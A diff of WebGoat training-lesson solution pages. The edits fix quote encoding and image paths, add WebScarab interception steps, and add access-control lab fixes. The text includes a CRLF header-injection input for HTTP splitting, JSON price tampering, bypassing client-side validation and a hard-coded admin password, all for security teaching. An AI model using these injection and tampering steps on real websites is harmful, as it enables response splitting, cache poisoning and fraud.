-this via <EFBFBD>Tools<EFBFBD> <20> <EFBFBD>Internet Options<EFBFBD> <20> <EFBFBD>Connections<EFBFBD> <20> <EFBFBD>LAN Settings<EFBFBD>. You
-must define proxy <EFBFBD>localhost<EFBFBD> with port 8008.<o:p></o:p></span></p>
+this via "Tools" <20> "Internet Options" <20> "Connections" <20> "LAN Settings". You
+must define proxy "localhost" with port 8008.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/HtmlClues.html

@@ -573,7 +573,7 @@ style='font-family:"Arial","sans-serif"'> Lesson 3<o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Right-click
-the page and select <EFBFBD>View source<EFBFBD><o:p></o:p></span></p>
+the page and select "View source"<o:p></o:p></span></p>
 
 <p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
 "Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_39"
@@ -616,7 +616,7 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the HTML
 source there is a comment that contains a user name admin and a password
-adminpw. Enter these values in WebGoat and click <EFBFBD>Login<EFBFBD><o:p></o:p></span></p>
+adminpw. Enter these values in WebGoat and click "Login"<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/HttpBasics.html

@@ -556,16 +556,14 @@ will accept the request, reverse the input, and display it back to the user,
 illustrating the basics of handling an HTTP request. <br>
 <br>
 The user should become familiar with the features of WebGoat by manipulating
-the above buttons to view hints, show the HTTP request parameters, the HTTP
-request cookies, and the Java source code.<o:p></o:p></span></p>
+the above buttons to view hints and solution. We have to use WebScarab for the first time<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span
 style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click <20>Show
-Params<EFBFBD> and <20>Show Cookies<65>.<o:p></o:p></span></p>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Add a Proxy on localhost in the settings of your browser. Then you can start WebScarab .We have to select "intercept request" in the tab "Intercept".<o:p></o:p></span></p>
 
 <p class=MsoNormal style='page-break-after:avoid'><span style='font-size:8.0pt;
 font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype
@@ -588,34 +586,23 @@ font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapety
  </v:formulas>
  <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
  <o:lock v:ext="edit" aspectratio="t"/>
-</v:shapetype><v:shape id="Picture_x0020_1" o:spid="_x0000_i1026" type="#_x0000_t75"
- style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="/WebGoat/lesson_solutions/HttpBasics_files/image001.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=370
-src="/WebGoat/lesson_solutions/HttpBasics_files/image005.jpg" v:shapes="Picture_x0020_1"><![endif]></span></p>
+<img src="/WebGoat/lesson_solutions/HttpBasics_files/webscarab1.jpg"></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
 <span style='mso-element:field-separator'></span><![endif]--><span
 style='mso-no-proof:yes'>1</span><!--[if supportFields]><span
-style='mso-element:field-end'></span><![endif]--> Enter your name<span
+style='mso-element:field-end'></span><![endif]--> Intercept Request<span
 style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Fill out your
-name and click the button Go!<o:p></o:p></span></p>
+name and click the button Go! We get a new WebScarab window, where we can find the parameter person.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif";
-mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_2" o:spid="_x0000_i1025"
- type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
- mso-wrap-style:square'>
- <v:imagedata src="/WebGoat/lesson_solutions/HttpBasics_files/image003.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=370
-src="/WebGoat/lesson_solutions/HttpBasics_files/image006.jpg" v:shapes="Picture_x0020_2"><![endif]></span><span
-style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+<img src="/WebGoat/lesson_solutions/HttpBasics_files/webscarab2.jpg">
 
 <p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/HttpOnly.html

@@ -712,7 +712,7 @@ normal'>Solution:<o:p></o:p></b></p>
 normal'><o:p>&nbsp;</o:p></b></p>
 
 <p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>HTTPOnly
-is not configured. When you click on <EFBFBD>Read Cookie<EFBFBD> you will get the following
+is not configured. When you click on "Read Cookie" you will get the following
 pop-up in JavaScript, displaying the cookies<o:p></o:p></span></p>
 
 <p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:
@@ -736,7 +736,7 @@ style='font-weight:normal;mso-bidi-font-weight:bold'><o:p></o:p></span></p>
 <p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>Select
-<EFBFBD>Yes<EFBFBD> to turn HTTPOnly on. Intercept the HTTP Request and HTTP Response in
+"Yes" to turn HTTPOnly on. Intercept the HTTP Request and HTTP Response in
 WebScarab.<o:p></o:p></span></p>
 
 <p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -777,7 +777,7 @@ cookie</p>
 <p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>Click
-on <EFBFBD>Read cookie<EFBFBD>. You will see the JSESSIONID which is not using HTTPOnly.<o:p></o:p></span></p>
+on "Read cookie". You will see the JSESSIONID which is not using HTTPOnly.<o:p></o:p></span></p>
 
 <p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
 style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_120"

webgoat/main/project/WebContent/lesson_solutions/HttpSplitting.html

@@ -691,8 +691,8 @@ Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></
 
 <!-- Start Instructions -->
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
-has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>
+This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while
 stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.<br>
 Enter a language for the system to search by. You will notice that the
 application is redirecting your request to another resource on the server. You
@@ -725,17 +725,20 @@ exploited successfully you will find the green check in the left menu.<o:p></o:p
  <o:lock v:ext="edit" aspectratio="t"/>
 </v:shapetype><v:shape id="Picture_x0020_159" o:spid="_x0000_i1038" type="#_x0000_t75"
  style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image001.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image001.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=640 height=370
-src="WebGoat/lesson_solutions/HttpSplitting_files/image029.jpg" v:shapes="Picture_x0020_159"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image029.jpg" v:shapes="Picture_x0020_159"><![endif]></span></p>
 
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
 style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
 
-<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
-style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>
+Please note that this solution is written for Windows. If you use Linux you have to alter it. 
+Windows uses a CR and LF for new Line. Linux uses only LF.
+So all the %0d%0a have to be replaced by %0a if you are using Linux.<br/><br/>
+<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Because the
 input is not validated you can inject any HTTP syntax, carriage returns and
@@ -753,9 +756,9 @@ requests and responses?<o:p></o:p></span></p>
 "Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_160"
  o:spid="_x0000_i1037" type="#_x0000_t75" style='width:480pt;height:277.5pt;
  visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image003.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image003.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=640 height=370
-src="WebGoat/lesson_solutions/HttpSplitting_files/image030.jpg" v:shapes="Picture_x0020_160"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image030.jpg" v:shapes="Picture_x0020_160"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -767,9 +770,9 @@ field-end'></span><![endif]--> Language en</p>
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_161" o:spid="_x0000_i1036"
  type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
  mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image005.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image005.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=642 height=459
-src="WebGoat/lesson_solutions/HttpSplitting_files/image031.jpg" v:shapes="Picture_x0020_161"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image031.jpg" v:shapes="Picture_x0020_161"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -783,9 +786,9 @@ field-end'></span><![endif]--> HTTP Request</p>
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_162" o:spid="_x0000_i1035"
  type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
  mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image007.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image007.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=642 height=459
-src="WebGoat/lesson_solutions/HttpSplitting_files/image032.jpg" v:shapes="Picture_x0020_162"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image032.jpg" v:shapes="Picture_x0020_162"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -799,9 +802,9 @@ field-end'></span><![endif]--> First HTTP Response</p>
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_163" o:spid="_x0000_i1034"
  type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
  mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image009.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image009.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=642 height=459
-src="WebGoat/lesson_solutions/HttpSplitting_files/image033.jpg" v:shapes="Picture_x0020_163"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image033.jpg" v:shapes="Picture_x0020_163"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -820,9 +823,9 @@ for the language en%0d%0a%0d%0a%0d%0a<o:p></o:p></span></p>
 "Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_164"
  o:spid="_x0000_i1033" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
  visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image011.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image011.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=642 height=459
-src="WebGoat/lesson_solutions/HttpSplitting_files/image034.jpg" v:shapes="Picture_x0020_164"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image034.jpg" v:shapes="Picture_x0020_164"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -836,9 +839,9 @@ field-end'></span><![endif]--> First HTTP Request</p>
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_165" o:spid="_x0000_i1032"
  type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
  mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image013.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image013.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=642 height=459
-src="WebGoat/lesson_solutions/HttpSplitting_files/image035.jpg" v:shapes="Picture_x0020_165"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image035.jpg" v:shapes="Picture_x0020_165"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -869,9 +872,9 @@ Wingdings'>J</span></span><span style='font-family:"Arial","sans-serif"'>&lt;/ht
 "Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_166"
  o:spid="_x0000_i1031" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
  visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image015.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image015.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=642 height=459
-src="WebGoat/lesson_solutions/HttpSplitting_files/image036.jpg" v:shapes="Picture_x0020_166"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image036.jpg" v:shapes="Picture_x0020_166"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -885,9 +888,9 @@ field-end'></span><![endif]--> HTTP Splitting attack</p>
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_167" o:spid="_x0000_i1030"
  type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
  mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image017.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image017.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=642 height=459
-src="WebGoat/lesson_solutions/HttpSplitting_files/image037.jpg" v:shapes="Picture_x0020_167"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image037.jpg" v:shapes="Picture_x0020_167"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -901,9 +904,9 @@ field-end'></span><![endif]--> HTTP Response</p>
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_168" o:spid="_x0000_i1029"
  type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
  mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image019.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image019.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=642 height=459
-src="WebGoat/lesson_solutions/HttpSplitting_files/image038.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image038.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -917,9 +920,9 @@ field-end'></span><![endif]--> Second HTTP Request</p>
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_169" o:spid="_x0000_i1028"
  type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
  mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image021.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image021.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=642 height=459
-src="WebGoat/lesson_solutions/HttpSplitting_files/image039.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image039.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -933,9 +936,9 @@ style='mso-element:field-end'></span><![endif]--> Second HTTP Response</p>
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_170" o:spid="_x0000_i1027"
  type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
  mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image023.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image023.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=640 height=370
-src="WebGoat/lesson_solutions/HttpSplitting_files/image040.jpg" v:shapes="Picture_x0020_170"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image040.jpg" v:shapes="Picture_x0020_170"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -954,9 +957,9 @@ button of your browser.<o:p></o:p></span></p>
 "Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_171"
  o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
  visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image025.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image025.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=640 height=370
-src="WebGoat/lesson_solutions/HttpSplitting_files/image041.jpg" v:shapes="Picture_x0020_171"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image041.jpg" v:shapes="Picture_x0020_171"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -988,9 +991,9 @@ Wingdings'>J</span></span><span style='font-family:"Arial","sans-serif"'>&lt;/ht
 yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_172" o:spid="_x0000_i1025"
  type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
  mso-wrap-style:square'>
- <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image027.png" o:title=""/>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image027.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=640 height=370
-src="WebGoat/lesson_solutions/HttpSplitting_files/image042.jpg" v:shapes="Picture_x0020_172"><![endif]></span></p>
+src="/WebGoat/lesson_solutions/HttpSplitting_files/image042.jpg" v:shapes="Picture_x0020_172"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
@@ -1006,7 +1009,7 @@ style='mso-element:field-end'></span><![endif]--> Inject cache poisoning</p>
 		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
 			Solution by Erwin Geirnaert 
 		</td>
-		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='/WebGoat/images/logos/zionsecurity.gif'></td>
 	</tr>
 </table>
 

webgoat/main/project/WebContent/lesson_solutions/JSONInjection.html

@@ -731,7 +731,7 @@ field-end'></span><![endif]--> Intercept HTTP Response</p>
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change the
-price for the expensive flight of $600 to $100 and click <EFBFBD>Accept changes<EFBFBD>.<o:p></o:p></span></p>
+price for the expensive flight of $600 to $100 and click "Accept changes".<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -770,7 +770,7 @@ field-end'></span><![endif]--> Injected result</p>
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Select the flight
-with no stops and the updated price and click <EFBFBD>Submit<EFBFBD>.<o:p></o:p></span></p>
+with no stops and the updated price and click "Submit".<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/JavaScriptValidation.html

@@ -618,7 +618,7 @@ field-end'></span><![endif]--> Intercept request<span style='font-family:"Arial"
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Add different
-symbols to the fields and click <EFBFBD>Accept changes<EFBFBD>.<o:p></o:p></span></p>
+symbols to the fields and click "Accept changes".<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -663,8 +663,8 @@ style='font-family:"Arial","sans-serif"'> Lesson 6 Completed<o:p></o:p></span></
 normal'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></i></b></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Reload the
-page by clicking on the menu item <EFBFBD>How to bypass Client-Side Javascript
-Validation<EFBFBD> and intercept the response in WebScarab.<o:p></o:p></span></p>
+page by clicking on the menu item "How to bypass Client-Side Javascript
+Validation" and intercept the response in WebScarab.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -685,7 +685,7 @@ src="/WebGoat/lesson_solutions/JavaScriptValidation_files/image011.jpg" v:shapes
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
 <span style='mso-element:field-separator'></span><![endif]--><span
 style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
-field-end'></span><![endif]--> Enable <EFBFBD>Intercept responses<EFBFBD><span
+field-end'></span><![endif]--> Enable "Intercept responses"<span
 style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -708,7 +708,7 @@ field-end'></span><![endif]--> Intercepted response<span style='font-family:
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you remove
-the onclick=<EFBFBD>validate();<EFBFBD> the <EFBFBD>Submit<EFBFBD> button will not work anymore.<o:p></o:p></span></p>
+the onclick="validate();" the "Submit" button will not work anymore.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Locate the
 validate() Javascript function in the HTML page.<o:p></o:p></span></p>
@@ -753,8 +753,8 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click <EFBFBD>Accept
-changes<EFBFBD>. This returns a HTML page like before but without any regular
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click "Accept
+changes". This returns a HTML page like before but without any regular
 expression checks.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -776,7 +776,7 @@ field-end'></span><![endif]--> It looks the same<span style='font-family:"Arial"
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change the
-fields in the HTML page to contain symbols like @#@@# and click <EFBFBD>Submit<EFBFBD>. <o:p></o:p></span></p>
+fields in the HTML page to contain symbols like @#@@# and click "Submit". <o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/Lab Access Control/Lab Add Business Layer Access Control.html

@@ -0,0 +1,50 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Role Based Access Control Stage2</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+In role-based access control scheme, a role represents 
+a set of access permissions and privileges. A user can be 
+assigned one or more roles. A role-based access control 
+normally consists of two parts: role permission management 
+and role assignment. A broken role-based access 
+control scheme might allow a user to perform accesses 
+that are not allowed by his/her assigned roles, or 
+somehow obtain unauthorized roles.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+Your goal is to explore the access control 
+rules that govern this site. Each role has permission to 
+certain resources (A-F). Each user is assigned one or more roles. 
+Only the user with the [Admin] role should have access 
+to the 'F' resources. In a successful attack, a user doesn't 
+have the [Admin] role can access resource F.
+</p>
+
+<p>
+<b>Solution:</b><br/>
+You have to be sure that the user is AUTHORIZED to do an action! So you have to check for his authorization.
+You have to write some code in the class 
+org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessControl.java.
+Alter the handleRequest method as there is happening the dispatching.
+There is already a method called isAuthorized which you can use:
+</p>
+<pre><code>
+//***************CODE HERE*************************
+if(!isAuthorized(s, userId, requestedActionName))
+{
+  throw new UnauthorizedException();
+}									
+//*************************************************
+</code></pre>
+Try the attack again and you will see that the authorization fails and the
+lesson is completed.
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab Access Control/Lab Add Data Layer Access Control.html

@@ -0,0 +1,56 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Role Based Access Control Stage4</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+In role-based access control scheme, a role represents 
+a set of access permissions and privileges. A user can be 
+assigned one or more roles. A role-based access control 
+normally consists of two parts: role permission management 
+and role assignment. A broken role-based access 
